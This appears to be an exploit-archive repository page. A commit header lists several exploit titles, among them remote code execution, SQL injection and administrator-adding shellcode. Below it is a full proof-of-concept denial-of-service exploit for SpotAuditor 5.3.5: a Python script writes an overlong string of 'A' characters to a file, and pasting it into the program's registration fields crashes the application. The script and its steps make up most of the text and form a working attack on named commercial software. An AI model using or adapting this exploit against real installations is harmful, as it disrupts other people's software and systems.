338282491b
8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
30 lines
No EOL
784 B
Python
Executable file
30 lines
No EOL
784 B
Python
Executable file
# Exploit Title: SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
|
|
# Exploit Author : Sinem Şahin
|
|
# Exploit Date: 2021-02-10
|
|
# Vendor Homepage : http://www.nsauditor.com/
|
|
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
|
|
# Tested on: Windows 7 x64
|
|
# Version: 5.3.5
|
|
|
|
|
|
# Steps:
|
|
1- Run the python script. (exploit.py)
|
|
2- Open payload.txt and copy content to clipboard.
|
|
3- Run 'SpotAuditor 5.3.5'.
|
|
4- Register -> Enter Registration Code
|
|
5- Paste clipboard into the "Name" or "Key".
|
|
6- Click on OK.
|
|
7- Crashed.
|
|
|
|
---> exploit.py <--
|
|
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 300
|
|
|
|
try:
|
|
f = open("payload.txt","w")
|
|
f.write(buffer)
|
|
f.close()
|
|
print"File okey!!"
|
|
except:
|
|
print "File is not created." |